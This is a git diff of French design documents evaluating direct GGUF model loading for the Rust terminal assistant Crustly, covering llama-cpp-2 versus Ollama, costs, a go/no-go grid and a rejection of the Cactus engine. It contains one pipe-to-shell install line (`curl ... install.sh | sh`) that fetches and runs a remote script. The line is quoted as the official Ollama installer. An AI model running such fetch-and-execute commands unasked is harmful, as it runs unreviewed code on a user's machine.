+  runners". À cela s'ajoute l'empreinte complète du modèle en mémoire tant
+  que `keep_alive` ne l'a pas déchargé (plusieurs Go de plus selon la
+  taille/quantization du modèle).
+- Ce coût est **permanent et indépendant de l'usage réel de Crustly** : le
+  daemon tourne dès qu'il est démarré (souvent au login, par défaut sur les
+  installateurs officiels), que Crustly soit lancé ou non.
+- Un moteur GGUF embarqué n'a **aucune empreinte mémoire en dehors des
+  sessions Crustly actives** : le modèle n'est chargé que pendant la durée
+  de vie du process qui en a besoin, et disparaît avec lui — cohérent avec
+  l'argument produit "reduced resource consumption" que Crustly met en avant
+  face à des concurrents plus lourds.
+- Bénéfice secondaire : un seul processus à surveiller/tracer/profiler
+  (`cargo build --features profiling` couvre déjà Crustly, mais pas le
+  comportement du daemon Ollama externe, hors de portée des outils de
+  profiling du projet).
+
+**Niveau de confiance : élevé** (chiffre sourcé sur un rapport public
+maintenu par l'éditeur d'Ollama lui-même, pas une estimation).
+
+### 4.2 Élimination de la dépendance à un service externe
+
+- **Environnements air-gapped / réseaux isolés** : un utilisateur avec un
+  fichier `.gguf` déjà sur disque peut lancer Crustly sans jamais avoir eu
+  besoin d'installer, configurer, ni faire tourner de service réseau, même
+  local. C'est un cas d'usage qu'Ollama ne couvre pas nativement (il faut
+  quand même installer et démarrer le daemon au préalable, même sans accès
+  Internet pour le `pull`).
+- **Postes contraints par une politique IT** : dans de nombreux
+  environnements d'entreprise, l'installation ou l'exécution de services
+  d'arrière-plan (daemons, ports d'écoute même en local) est soumise à
+  autorisation ou bloquée par la politique de sécurité du poste. Un binaire
+  unique sans port d'écoute local évite cette classe de blocage.
+- **CI/CD et conteneurs éphémères** : dans un pipeline ou une image Docker
+  jetable, démarrer et attendre qu'un second processus (Ollama) soit prêt
+  avant de lancer Crustly ajoute de la complexité d'orchestration
+  (health-check, ordre de démarrage, gestion du cycle de vie du conteneur
+  compagnon). Un binaire unique élimine cette coordination.
+- **Pas de "port déjà utilisé" / conflit réseau local** : un moteur en
+  process n'ouvre aucun port TCP local, contrairement au daemon Ollama
+  (`:11434`) — supprime une classe entière de bugs de support
+  ("Ollama unreachable at http://localhost:11434", déjà un message d'erreur
+  documenté dans le plan d'intégration `ollama-rs`).
+
+**Niveau de confiance : élevé** pour les cas air-gapped/IT-restreint (besoin
+binaire, pas de solution de contournement) ; **moyen** pour le confort
+général (Ollama s'installe et démarre déjà automatiquement sur la plupart
+des postes de développement standards).
+
+### 4.3 Fiabilité du tool-calling via génération contrainte par grammaire
+
+Crustly s'appuie massivement sur le tool-calling (21+ tools). Aujourd'hui,
+avec les modèles locaux via Ollama, la fiabilité de ce mécanisme dépend
+entièrement du template de chat du modèle et de sa capacité à respecter le
+format `tool_calls` attendu — au point que Crustly a dû ajouter une
+**heuristique de secours** : `maybe_tool_call_json`/`tool_call_from_content`
+(`ollama.rs` lignes 607-655) qui détecte un tool call imprimé en JSON brut
+dans le flux de texte quand le modèle ne peuple pas le champ natif, et
+`qwen.rs` a son propre `ToolCallParser` pour deux formats différents
+("hermes"/"openai"). L'existence même de ces deux mécanismes de
+récupération témoigne d'un problème réel et déjà rencontré en pratique, pas
+hypothétique.
+
+`llama-cpp-2` expose la génération contrainte par grammaire de `llama.cpp`
+(GBNF, feature `llguidance`) : le format de sortie du modèle peut être
+**restreint au niveau du vocabulaire à chaque étape de décodage**, de sorte
+que le modèle ne peut physiquement pas produire un token qui violerait le
+schéma JSON attendu. Documentation `llama.cpp` : cela *"elimine
+effectivement les erreurs de syntaxe dans les sorties structurées"* — un
+changement de nature par rapport à une heuristique de récupération après
+coup, qui ne peut que *deviner* qu'un texte ressemble à un tool call raté.
+Limite honnête à noter : la contrainte de grammaire garantit la
+**syntaxe**, pas l'épuisement du budget de tokens avant la fin d'une
+structure JSON valide (cas limite documenté par la communauté `llama.cpp`)
+— un filet de sécurité reste donc utile même avec la grammaire activée,
+mais le taux d'échec structurel de base change de catégorie (de "arrive
+régulièrement selon le modèle" à "cas limite rare de troncature").
+
+**Niveau de confiance : moyen-élevé** — le mécanisme est documenté et
+largement utilisé dans l'écosystème `llama.cpp` (`llama-cpp-python`,
+`node-llama-cpp` l'exposent aussi), mais son intégration dans Crustly
+resterait à construire (mapping des `Tool.input_schema` déjà génériques de
+`provider/types.rs` vers une grammaire GBNF) — un coût, détaillé en §5, mais
+qui débloque un bénéfice qu'aucune des solutions HTTP actuelles
+(Ollama/OpenAI-compat) ne peut offrir, celles-ci étant limitées à ce que le
+serveur distant expose.
+
+### 4.4 Support multimodal natif (`mtmd`)
+
+La feature `mtmd` de `llama-cpp-2` couvre l'inférence multimodale
+(vision), ce qui correspondrait à `Provider::supports_vision()`
+(`trait.rs` ligne 42). Bénéfice de parité stricte avec Ollama/OpenAI-compat,
+qui gèrent déjà la vision aujourd'hui — un moteur GGUF natif sans cette
+feature serait une régression ; avec elle, aucune perte de capacité pour
+l'utilisateur qui migrerait vers ce chemin.
+
+### 4.5 Contrôle total du cycle de vie du modèle
+
+Avec un moteur embarqué, Crustly décide directement :
+
+- **du moment exact du chargement/déchargement** du modèle, sans dépendre
+  du réglage `keep_alive` d'un daemon externe (actuellement configurable
+  côté Crustly via `providers.ollama.keep_alive`, mais toujours appliqué
+  *par Ollama*, avec ses propres heuristiques de gestion mémoire globale
+  entre plusieurs modèles/clients) ;
+- **des paramètres d'inférence bas niveau** (nombre de threads CPU, nombre
+  de couches déportées sur GPU, taille de contexte) sans passer par les
+  valeurs par défaut ou les Modelfiles d'Ollama ;
+- **de la coordination avec le reste de l'application** : par exemple,
+  libérer explicitement la mémoire du modèle pendant une opération
+  Crustly gourmande en RAM (compaction de contexte, traitement d'un gros
+  fichier), une coordination impossible avec un processus externe qui ne
+  connaît pas l'état interne de Crustly.
+
+Ce niveau de contrôle n'est valorisable que si le produit a un besoin réel de
+cette finesse — sinon c'est un bénéfice théorique. À rapprocher de la
+question ouverte §7.2.
+
+### 4.6 Onboarding utilisateur simplifié
+
+Aujourd'hui, l'utilisateur qui veut du local doit : installer Ollama
+(`curl -fsSL https://ollama.com/install.sh | sh`), vérifier qu'il tourne,
+puis `ollama pull <modèle>`, puis configurer Crustly pour pointer dessus
+(`docs/guides/OLLAMA_GUIDE.md`) — un parcours en plusieurs étapes sur deux
+outils distincts. Avec un moteur GGUF natif, le parcours se réduirait à :
+télécharger un fichier `.gguf` (HuggingFace ou autre source) et pointer
+Crustly dessus (`crustly run --model /chemin/vers/modele.gguf` ou équivalent
+config) — un seul outil, un chemin de configuration. Bénéfice direct pour
+l'acquisition de nouveaux utilisateurs qui essaient Crustly pour la première
+fois sans vouloir gérer un service tiers.
+
+**Niveau de confiance : moyen** — dépend de la disponibilité de fichiers
+`.gguf` prêts à l'emploi (avec Ollama, `ollama pull` gère la découverte et
+le téléchargement ; avec un `.gguf` brut, l'utilisateur doit trouver et
+télécharger le bon fichier lui-même, sauf si Crustly ré-implémente cette
+brique — coût déjà noté en §5).
+
+### 4.7 Différenciation compétitive
+
+Les assistants IA terminal comparables (Aider, et d'autres outils du même
+segment) délèguent tous l'inférence locale à un backend externe
+(Ollama, LM Studio, vLLM). Un chargement GGUF natif ferait de Crustly l'un
+des rares outils du segment à offrir une **véritable exécution
+monolithique** de bout en bout, y compris en local — un argument de
+positionnement produit distinct, cohérent avec l'identité "performance et
+efficacité mémoire" déjà revendiquée par le projet.
+
+**Niveau de confiance : qualitatif** — bénéfice stratégique, non mesurable
+directement, à valider par la stratégie produit plutôt que par une métrique
+technique.
+
+### 4.8 Tableau récapitulatif des bénéfices
+
+| # | Bénéfice | Nature | Niveau de confiance | Dépend de |
+|---|---|---|---|---|
+| 1 | Réduction de l'empreinte ressources (pas de daemon permanent ~1 Go+) | Quantifiable, sourcé | Élevé | — |
+| 2 | Fonctionne air-gapped / IT-restreint / CI éphémère | Fonctionnel, binaire (marche ou pas) | Élevé (cas dur) / Moyen (confort général) | Besoin produit réel (§6) |
+| 3 | Tool-calling plus fiable (grammaire GBNF) | Qualitatif, mécanisme documenté | Moyen-élevé | Effort d'intégration (§5.2) |
+| 4 | Parité multimodale (`mtmd`) | Fonctionnel | Élevé | Activation de la feature |
+| 5 | Contrôle fin du cycle de vie du modèle | Qualitatif | Moyen | Besoin produit réel |
+| 6 | Onboarding simplifié (un seul outil) | UX | Moyen | Solution de téléchargement de `.gguf` (à construire) |
+| 7 | Différenciation compétitive | Stratégique | Qualitatif | Positionnement produit voulu |
 
 ---
 
-## 5. Coûts
+## 5. Coûts (résumé — détail dans les sections précédentes de ce document avant réécriture, condensé ici pour équilibrer l'étude)
 
 ### 5.1 Build et packaging
 
-- `llama-cpp-sys-2` compile le sous-module Git vendoré de `llama.cpp` via la
-  crate `cmake` à chaque `cargo build` (à moins d'utiliser `system-ggml` avec
-  une lib système préinstallée) — nécessite **CMake et un compilateur C++**
-  sur toute machine qui build Crustly avec la feature `gguf` activée. Rompt
-  la promesse actuelle de `CLAUDE.md` ("Development build: `cargo build`",
-  sans toolchain externe) pour quiconque active cette feature.
-- **Windows** : le `build.rs` distingue explicitement MSVC (`.lib`) et
-  MinGW/GNU (`.a`), avec des drapeaux spécifiques (`/O2`, `/DNDEBUG`, `/FS`,
-  désactivation de `TrackFileAccess`) — signale un chemin de build testé
-  mais qui ajoute une exigence d'outillage (Visual Studio Build Tools avec
-  charge de travail C++, ou toolchain MinGW) absente aujourd'hui du poste de
-  développement Crustly type.
-- **CUDA/Vulkan/ROCm/MKL** ne sont pas auto-détectés : CUDA nécessite un
-  toolkit installé, Vulkan nécessite la variable d'environnement
-  `VULKAN_SDK`, etc. — chaque backend GPU est une case de configuration
-  manuelle supplémentaire pour l'utilisateur qui build depuis les sources.
-- Temps de compilation à froid fortement augmenté (compilation C++ native
-  de `llama.cpp`, en plus du Rust).
-- Taille du binaire final en hausse significative (moteur natif + kernels
-  backend embarqués), sans compter le poids des fichiers `.gguf`
-  eux-mêmes (plusieurs Go par modèle, à gérer côté disque indépendamment
-  du mécanisme de chargement).
+CMake + compilateur C++ requis pour compiler le sous-module vendoré
+`llama.cpp` à chaque `cargo build` avec la feature activée — rompt la
+promesse actuelle "juste `cargo build`" de `CLAUDE.md`. Windows nécessite
+Visual Studio Build Tools (C++) ou MinGW ; CUDA/Vulkan/ROCm/MKL demandent une
+configuration manuelle (toolkit installé, `VULKAN_SDK`, etc.). Temps de
+build à froid et taille du binaire final en hausse significative.
 
 ### 5.2 Nouveau code applicatif
 
-- Nouveau provider (`src/llm/provider/gguf.rs`) : chargement du modèle,
-  création du contexte d'inférence, tokenisation, décodage par batch,
-  sampling (température/top-p/top-k, feature `sampler`), reconstruction de
-  `StreamEvent` token par token — sur le même patron que `stream()` dans
-  `ollama.rs` (ligne 543), qui est déjà le meilleur précédent en place pour
-  un backend local "from scratch" (accumulation des deltas, construction
-  manuelle de `MessageStart`/`ContentBlockDelta`/`MessageStop`).
-- **Tool/function calling à ré-implémenter** : `llama-cpp-2` ne fait aucune
-  hypothèse sur le format de sortie d'un modèle — contrairement à Ollama qui
-  gère aujourd'hui le tool-calling côté serveur. Deux options :
-  - reprendre l'approche heuristique déjà en place (`maybe_tool_call_json`/
-    `tool_call_from_content` dans `ollama.rs`, `ToolCallParser` de
-    `qwen.rs`) — coût de portage modéré, fiabilité identique à l'existant ;
-  - investir dans `llguidance` (génération contrainte par grammaire) pour
-    une fiabilité supérieure — coût d'intégration plus élevé (apprentissage
-    de l'API `llguidance`/`toktrie`, définition d'une grammaire JSON Schema
-    à partir des `Tool.input_schema` déjà génériques dans
-    `provider/types.rs`), mais bénéfice net réel (§4 point 6).
-- Gestion mémoire/concurrence : un modèle chargé occupe la RAM pendant toute
-  la durée de vie du process Crustly (ou nécessite une logique de
-  déchargement maison, ré-implémentant le `keep_alive` qu'Ollama gère
-  aujourd'hui) ; le décodage CPU doit être isolé dans une tâche
-  `tokio::task::spawn_blocking` pour ne pas geler la boucle d'événements TUI
-  pendant l'inférence — un risque absent aujourd'hui puisque l'inférence
-  tourne toujours dans un process séparé (Ollama).
-- **Gestion de catalogue/téléchargement de modèles** : avec un fichier
-  `.gguf` brut, la responsabilité de trouver, télécharger et vérifier
-  l'intégrité (checksum) du fichier revient entièrement à Crustly — Ollama
-  gère aujourd'hui cela via `ollama pull <repo:tag>`, déjà exposé dans
-  Crustly (`crustly ollama pull`, dialog TUI `Ctrl+D`, cf.
-  `ollama-rs-integration-plan.md` §5.7). Un provider GGUF natif perd cette
-  capacité sauf à la ré-implémenter (résolution d'URL HuggingFace,
-  téléchargement avec barre de progression, vérification de checksum).
+Nouveau provider (`src/llm/provider/gguf.rs`), nouveau `GgufProviderConfig`
+(§3), ré-implémentation du tool-calling (heuristique texte reprise de
+`ollama.rs`/`qwen.rs`, ou investissement dans `llguidance` pour le bénéfice
+§4.3), gestion mémoire/concurrence (`tokio::task::spawn_blocking` pour ne
+pas geler la boucle TUI), et ré-implémentation de la découverte/du
+téléchargement de modèles (aujourd'hui gérés par `ollama pull`).
 
 ### 5.3 Maintenance long terme
 
-- **Pas de SemVer strict** (assumé par les mainteneurs de `llama-cpp-rs`,
-  qui priorisent le suivi de `llama.cpp` en amont) : des mises à jour de
-  version peuvent introduire des changements d'API non annoncés par un bump
-  majeur classique — nécessite un pin de version plus prudent et une revue
-  de changelog à chaque mise à jour, contrairement aux autres dépendances du
-  projet qui suivent SemVer.
-- Nouvelle surface de sécurité : exécution de code natif C++ dans le même
-  process que le reste de l'application, sur un fichier binaire fourni par
-  l'utilisateur (`.gguf`) — à contraster avec le modèle actuel où Ollama
-  tourne en process séparé (isolation naturelle des crashs/fuites mémoire du
-  moteur d'inférence vis-à-vis du reste de Crustly : TUI, DB, exécution des
-  tools).
-- Dépendance C++ vendorée à suivre hors de l'écosystème `cargo update`
-  standard (mises à jour de sécurité/performance de `llama.cpp` en amont).
-- **Tests CI plus difficiles qu'avec Ollama** : le plan d'intégration
-  `ollama-rs` note déjà qu'un test contre un vrai serveur Ollama est "non
-  exécutable en CI" (test manuel local). Avec un moteur embarqué, il n'y a
-  même plus de serveur à mocker/stubber facilement pour les tests
-  d'intégration légers — il faudrait soit invoquer un vrai `.gguf` (poids de
-  plusieurs centaines de Mo minimum à héberger/télécharger en CI), soit se
-  limiter à des tests unitaires sur le mapping de types (comme
-  aujourd'hui), sans jamais exercer le chemin d'inférence réel en CI.
+Pas de SemVer strict côté `llama-cpp-2` (suit `llama.cpp` en amont, pin de
+version à surveiller plus attentivement), nouvelle surface de sécurité
+(exécution de code natif C++ sur un fichier `.gguf` fourni par
+l'utilisateur, dans le même process que la TUI/DB/tools — perte de
+l'isolation crash/mémoire qu'offre aujourd'hui le process séparé Ollama),
+dépendance C++ vendorée hors `cargo update`, tests CI plus difficiles
+(aucun serveur à mocker, il faudrait invoquer un vrai `.gguf`).
 
 ### 5.4 Ce qui est perdu par rapport à Ollama
 
-- **Partage de modèle entre plusieurs process** : Ollama charge un modèle
-  une fois et sert plusieurs clients depuis le même processus serveur ; un
-  moteur embarqué dans Crustly rechargerait le modèle à chaque instance de
-  Crustly lancée (RAM et temps de démarrage multipliés par le nombre de
-  sessions concurrentes).
-- **Déchargement automatique par inactivité** (`keep_alive` d'Ollama) — à
-  réimplémenter côté Crustly si souhaité.
-- **Catalogue de modèles nommés** (`llama3.2:3b`, etc.) — avec un `.gguf`
-  brut, l'utilisateur gère lui-même ses fichiers, sans le confort d'un nom
-  court résolu automatiquement.
+Partage de modèle entre plusieurs process (un chargement par instance
+Crustly au lieu d'un chargement partagé), déchargement automatique par
+inactivité à réimplémenter, catalogue de modèles nommés
+(`llama3.2:3b` → nom court) remplacé par la gestion manuelle de fichiers.
+
+### 5.5 Estimation d'effort
+
+Plusieurs semaines pour un MVP correct (build multi-plateforme, chargement,
+complétion, streaming, tool-calling basique), contre quelques jours pour un
+client HTTP vers un serveur déjà bâti (Ollama). Effort significativement
+plus élevé si `llguidance` est intégré dès le MVP plutôt que dans une
+itération ultérieure.
 
 ---
 
-## 6. Estimation d'effort (ordre de grandeur)
+## 6. Cadre de décision Go/No-Go
 
-À titre de comparaison, l'intégration `ollama-rs` (client HTTP typé,
-documentée dans `ollama-rs-integration-plan.md`) a représenté 4 phases
-livrées progressivement, sans aucun code d'inférence à écrire. Un provider
-GGUF natif via `llama-cpp-2` couvre un périmètre fonctionnel comparable
-**plus** un moteur d'inférence embarqué à intégrer, tester et maintenir :
-raisonnablement, **plusieurs semaines** de travail pour un MVP correct
-(build multi-plateforme, chargement modèle, complétion, streaming,
-tool-calling basique par heuristique texte), et significativement plus si
-`llguidance` est intégré dès le MVP plutôt que dans une itération
-ultérieure. Contre quelques jours pour un client HTTP vers un serveur déjà
-bâti et testé par une large communauté (Ollama).
+Grille de critères à évaluer contre les priorités produit réelles de
+Crustly — chaque critère "dur" coché suffit à justifier un GO ; en leur
+absence, le rapport effort/bénéfice ne le justifie pas encore.
 
-Le rapport effort/bénéfice n'est positif que si "zéro dépendance de service
-externe" est une **exigence produit dure** (usage air-gapped, distribution à
-des utilisateurs sans droits d'installation de service tiers) — pas une
-simple préférence de simplicité perçue, largement déjà couverte
-aujourd'hui par Ollama qui s'installe et démarre automatiquement en
-arrière-plan sur les trois plateformes cibles.
+| Critère | Type | Statut aujourd'hui | Si "oui" → |
+|---|---|---|---|
+| Un usage air-gapped / sans accès réseau local est un cas d'usage cible explicite | Dur | À confirmer par le produit | **GO** — aucune alternative HTTP ne couvre ce cas |
+| Des utilisateurs cibles sont sur des postes où l'installation/exécution d'un daemon est bloquée par la politique IT | Dur | À confirmer par le produit | **GO** — même raison |
+| Le taux d'échec actuel du tool-calling avec les modèles locaux (heuristique texte) est mesuré comme un point de friction utilisateur significatif | Dur si mesuré | Non mesuré à ce jour (aucune télémétrie de taux d'échec identifiée dans le code) | **GO**, avec priorité sur `llguidance` dès le MVP |
+| La réduction de l'empreinte mémoire "au repos" est un objectif produit chiffré (ex. cible RAM totale documentée) | Souple | Aligné avec le positionnement `CLAUDE.md`, mais pas de cible chiffrée trouvée dans le dépôt | Renforce un GO, ne le déclenche pas seul |
+| L'équipe a la capacité de maintenir une dépendance C++ vendorée hors SemVer strict sur le long terme | Prérequis | À évaluer (taille équipe, expertise C++/CMake disponible) | Condition **bloquante** si "non", indépendamment des bénéfices |
+| Un budget de plusieurs semaines dédiées est disponible à court terme sans repousser une autre priorité critique | Prérequis | À arbitrer par la roadmap | Condition bloquante si "non" |
+
+**Lecture recommandée de la grille** :
+1. Vérifier d'abord les deux **prérequis** (capacité de maintenance C++,
+   budget de temps) — s'ils ne sont pas remplis, la question est **prématurée**
+   quel que soit le score des bénéfices : mieux vaut la rouvrir plus tard.
+2. Si les prérequis sont remplis, vérifier les critères **durs** : un seul
+   suffit à justifier un GO, car ce sont des besoins qu'aucune alternative
+   HTTP actuelle (Ollama, OpenAI-compat) ne peut satisfaire.
+3. Si aucun critère dur n'est confirmé, les bénéfices restent réels (§4) mais
+   **discrétionnaires** : un NO-GO à ce stade est raisonnable, avec
+   réévaluation dès qu'un critère dur apparaît (ex. une demande utilisateur
+   documentée pour un usage air-gapped).
+
+**Conclusion de cette étude** : sur la base des seules informations
+disponibles dans ce dépôt à la date de rédaction (aucune mention d'objectif
+air-gapped, aucune contrainte IT documentée, aucune télémétrie de taux
+d'échec de tool-calling), **aucun critère dur n'est aujourd'hui confirmé** —
+le score penche pour un **NO-GO conditionnel**, à réévaluer dès que l'un des
+trois critères durs du tableau reçoit une réponse positive du produit. Le
+bénéfice §4.1 (alignement ressources) reste valable comme argument
+d'appoint, mais insuffisant seul pour justifier plusieurs semaines
+d'ingénierie et une nouvelle dépendance C++ à maintenir hors SemVer.
 
 ---
 
-## 7. Tableau de synthèse
+## 7. Questions ouvertes pour trancher
 
-| Critère | Statu quo (Ollama natif + compat OpenAI) | `llama-cpp-2` (moteur embarqué) |
-|---|---|---|
-| Charge un `.gguf` sans conversion | Délégué à Ollama (oui, côté serveur) | ✅ natif, in-process |
-| Dépendance à un service externe | Oui (daemon Ollama) | ❌ aucune |
-| Licence | — | ✅ MIT OR Apache-2.0, compatible FSL-1.1-MIT |
-| Toolchain de build | `cargo build` seul | CMake + compilateur C++ requis |
-| Tool-calling | Géré côté serveur Ollama (+ heuristique texte côté Crustly) | À ré-implémenter (heuristique ou `llguidance`) |
-| Gestion catalogue/téléchargement modèles | ✅ déjà livré (`crustly ollama pull`, TUI) | À ré-implémenter |
-| Partage modèle multi-process | ✅ (un seul chargement, N clients) | ❌ (un chargement par instance Crustly) |
-| Isolation crash/mémoire du moteur d'inférence | ✅ (process séparé) | ❌ (même process que la TUI/DB) |
-| Effort d'intégration | Déjà fait | Plusieurs semaines (MVP) |
-| Testabilité CI | Limitée (test manuel documenté) | Plus limitée encore (pas de serveur à mocker) |
-
----
-
-## 8. Questions ouvertes avant toute décision
-
-1. Le besoin "monolithique, pas de service externe" est-il une **contrainte
-   produit ferme** (usage air-gapped, distribution à des utilisateurs sans
-   droits d'installation de service tiers) ou une **préférence de confort** ?
-   La réponse change complètement le calcul coût/bénéfice du §6.
-2. Quel périmètre de backends est requis au lancement : CPU seulement (plus
-   simple à builder/tester, plus lent) ou CPU+GPU (CUDA/Metal, complexité de
-   build et matrice de test multipliées) ?
-3. Le tool/function calling (utilisé massivement par les 21+ tools de
-   Crustly) est-il requis dès le MVP GGUF natif, ou une première version
-   "chat simple, pas de tools" est-elle acceptable pour valider l'intérêt
-   avant d'investir dans le parsing de tool calls sur un moteur brut ?
-4. Faut-il viser `llguidance` (génération contrainte) dès le MVP, ou
-   commencer par l'heuristique texte déjà éprouvée dans `ollama.rs`/`qwen.rs`
-   et migrer plus tard si le besoin de fiabilité le justifie ?
-5. Le binaire par défaut de Crustly doit-il rester sans la feature `gguf`
-   (comme c'est le cas pour `ollama` aujourd'hui — optionnelle, pas dans
-   `default`), ou cette capacité est-elle jugée assez centrale pour changer
-   cette politique ?
+1. Un usage air-gapped ou fortement restreint par une politique IT est-il un
+   cas d'usage cible **documenté**, ou une hypothèse de cette étude ?
+   (Critère dur #1/#2 du §6 — à confirmer avant toute décision.)
+2. Existe-t-il une mesure, même informelle, du taux d'échec du tool-calling
+   avec les modèles locaux aujourd'hui (retours utilisateurs, issues
+   GitHub) ? Cela transformerait le bénéfice §4.3 en critère dur.
+3. Quel périmètre de backends est requis au lancement : CPU seulement (plus
+   simple) ou CPU+GPU (CUDA/Metal, complexité de build multipliée) ?
+4. Faut-il viser `llguidance` dès le MVP, ou commencer par l'heuristique
+   texte déjà éprouvée et migrer plus tard ?
+5. L'équipe dispose-t-elle de l'expertise CMake/C++ nécessaire pour
+   maintenir cette dépendance sur la durée (prérequis bloquant du §6) ?
 6. Qui gère la vérification d'intégrité (checksum) et la provenance des
-   fichiers `.gguf` fournis par l'utilisateur, sachant qu'ils sont exécutés
-   par du code natif dans le même process que le reste de l'application ?
+   fichiers `.gguf` fournis par l'utilisateur, exécutés par du code natif
+   dans le même process que le reste de l'application ?
 
 ---
 
-## 9. Suite à donner
+## 8. Suite à donner
 
-Ce document est un **plan d'évaluation**, pas une décision.
-
-- **Aucune décision** (statu quo) → rien à faire, ce document reste comme
-  trace de l'évaluation.
-- **Décision d'intégrer `llama-cpp-2`** → recommandé de commencer par un
-  **spike technique isolé** (hors branche principale) : charger un petit
-  `.gguf` (ex. modèle 1-3B), obtenir une complétion et un streaming
-  fonctionnels, mesurer le temps de build à froid et la taille du binaire
-  réels sur les trois plateformes cibles, avant tout engagement sur le plan
-  complet. Documenter ensuite le choix dans une ADR dédiée
-  `docs/architecture/decisions/0005-<titre>.md` (Context/Decision/
-  Consequences, cf. gabarit `0000-adr-template.md`) qui renverra vers ce
-  fichier pour le détail — même articulation que l'ADR `0003` vers
-  `docs/guides/CRABRACE_INTEGRATION.md`. L'implémentation suivrait ensuite le
-  même triptyque que l'intégration Ollama : plan d'intégration détaillé →
-  plan de test → guide utilisateur (`docs/guides/`), sur le modèle de
-  `ollama-rs-integration-plan.md` + `ollama-local-llm-test-plan.md` +
-  `docs/guides/OLLAMA_GUIDE.md`.
+- **NO-GO / réévaluation ultérieure** (conclusion actuelle, §6) → conserver
+  ce document comme référence, le ressortir dès qu'un critère dur du §6
+  reçoit une réponse positive.
+- **GO** (si un critère dur est confirmé) → commencer par un **spike
+  technique isolé** (hors branche principale) : charger un petit `.gguf`
+  (1-3B), obtenir complétion + streaming fonctionnels, mesurer temps de
+  build à froid et taille du binaire réels sur les trois plateformes
+  cibles. Documenter ensuite le choix dans une ADR dédiée
+  `docs/architecture/decisions/0005-<titre>.md` (gabarit
+  `0000-adr-template.md`) renvoyant vers ce fichier pour le détail — même
+  articulation que l'ADR `0003` vers `docs/guides/CRABRACE_INTEGRATION.md`.
+  Implémentation ensuite selon le même triptyque que l'intégration Ollama :
+  plan d'intégration détaillé → plan de test → guide utilisateur
+  (`docs/guides/`).
 
 ---
 
@@ -459,7 +464,9 @@ Ce document est un **plan d'évaluation**, pas une décision.
 
 - [utilityai/llama-cpp-rs](https://github.com/utilityai/llama-cpp-rs) — README, structure du dépôt, exemples
 - [llama-cpp-2 sur crates.io](https://crates.io/crates/llama-cpp-2) — version, licence, statistiques de téléchargement
-- `llama-cpp-2/Cargo.toml` et `llama-cpp-sys-2/build.rs` (dépôt `utilityai/llama-cpp-rs`) — features Cargo et logique de build CMake/Windows
+- `llama-cpp-2/Cargo.toml` (dépôt `utilityai/llama-cpp-rs`) — features Cargo
+- [ollama/ollama issue #7168](https://github.com/ollama/ollama/issues/7168) — empreinte mémoire du daemon Ollama au repos (~1 Go, "embedded runners")
+- Documentation `llama.cpp` sur les grammaires GBNF et la génération contrainte (structured output / function calling)
 - `ollama-rs-integration-plan.md` (ce dépôt) — référence de comparaison d'effort et patrons d'implémentation (streaming, tool-calling heuristique, feature flags)
 - `docs/architecture/decisions/0003-crabrace-provider-registry.md` — architecture de découverte de providers existante
 - `src/llm/provider/trait.rs`, `src/llm/provider/ollama.rs`, `src/config/mod.rs`, `Cargo.toml` (ce dépôt) — interface `Provider`, conventions de feature flags et écarts de schéma de configuration actuels

--- a/llm-file-gguf-support.md
+++ b/llm-file-gguf-support.md
@@ -1,0 +1,412 @@
+# Spécification d'évaluation : chargement direct de modèles GGUF (sans Ollama)
+
+Statut : **Évaluation — aucune implémentation engagée**
+Date : 2026-07-21
+Portée : évaluer l'intégration de tout ou partie de
+[`cactus-compute/cactus`](https://github.com/cactus-compute/cactus) (ou d'une
+alternative) pour permettre à Crustly de charger et exécuter un modèle depuis
+un fichier `.gguf` local, **sans dépendre d'un serveur Ollama externe**, dans
+l'objectif d'obtenir une application plus monolithique.
+
+---
+
+## 0. Résumé exécutif
+
+**Recommandation : ne pas intégrer `cactus-compute/cactus`.** Trois blocages
+indépendants, chacun suffisant à lui seul :
+
+1. **Licence incompatible avec la distribution actuelle de Crustly.** Cactus
+   est sous licence propriétaire (Cactus Compute, Inc.), gratuite seulement
+   pour les particuliers, les organismes à but non lucratif, et les
+   organisations dont le financement **et** le chiffre d'affaires sont tous
+   deux inférieurs à 2 000 000 USD — avec **résiliation automatique** au
+   franchissement de l'un des deux seuils. Intégrer ce moteur dans un binaire
+   Crustly redistribué publiquement reporterait cette contrainte sur chaque
+   utilisateur/redistributeur en aval, ce que Crustly (sous FSL-1.1-MIT, un
+   modèle "source-available" qui redevient MIT après 2 ans, mais reste
+   librement redistribuable dès maintenant) ne peut pas garantir de respecter.
+2. **Depuis sa v1, Cactus ne charge plus directement des fichiers `.gguf`** :
+   le moteur est passé d'un pipeline basé GGUF à un format propriétaire
+   ("Cactus bundle") produit par `cactus convert`, avec une quantization
+   maison (CQ2–CQ4). La documentation marketing continue de mentionner "tout
+   modèle GGUF depuis HuggingFace", mais le mécanisme réel est une
+   **conversion**, pas un chargement natif — l'objectif "lire un `.gguf`
+   existant sans étape intermédiaire" n'est donc pas rempli tel quel.
+3. **Cible plateforme désalignée.** Cactus est conçu et optimisé pour
+   mobile/edge (iOS, Android, ARM NEON, Metal) ; ses bindings Rust
+   (`bindings/rust/cactus.rs`) sont un wrapper FFI fin au-dessus d'une
+   bibliothèque native précompilée par plateforme (toolchain CMake/Xcode/NDK
+   requise), et ne sont **pas publiés sur crates.io**. Crustly cible des
+   postes de développement Linux/macOS/Windows x86_64/arm64 en `cargo build`
+   simple — le pipeline de build de Cactus n'a pas cette garantie.
+
+Si l'objectif "monolithique, zéro dépendance externe, lire un `.gguf`
+directement" reste souhaité, la voie techniquement correcte est un binding
+Rust vers **llama.cpp** (ex. crate `llama-cpp-2`), qui lit nativement le
+format GGUF de référence et est disponible sur crates.io sous licence MIT.
+Mais c'est un projet d'ampleur différente d'une intégration de client HTTP
+(comparable à l'intégration `ollama-rs` déjà faite) : c'est l'embarquement
+d'un moteur d'inférence natif C++ dans le binaire, avec les coûts de build,
+de taille binaire et de maintenance que cela implique (détaillés en §6).
+**Recommandation secondaire : traiter cette option comme une ADR séparée,
+précédée d'un spike technique isolé, avant tout engagement de développement.**
+
+---
+
+## 1. Contexte : pourquoi cette évaluation
+
+Crustly supporte aujourd'hui l'inférence locale via deux chemins, tous deux
+**des clients HTTP vers un processus externe** :
+
+| Chemin | Fichier | Mécanisme |
+|---|---|---|
+| Ollama natif | `src/llm/provider/ollama.rs` | `ollama-rs` → HTTP vers `http://localhost:11434` (`/api/chat`, `/api/pull`, …) |
+| Compatible OpenAI (LM Studio, Ollama, LocalAI) | `src/llm/provider/openai.rs` avec `base_url` custom | `async-openai`/HTTP vers un serveur OpenAI-compatible local |
+
+Dans les deux cas, **Crustly ne charge jamais lui-même de poids de modèle** :
+il délègue entièrement l'inférence (chargement du `.gguf`, quantization au
+runtime, kernels CPU/GPU, gestion mémoire du KV-cache) à un processus tiers
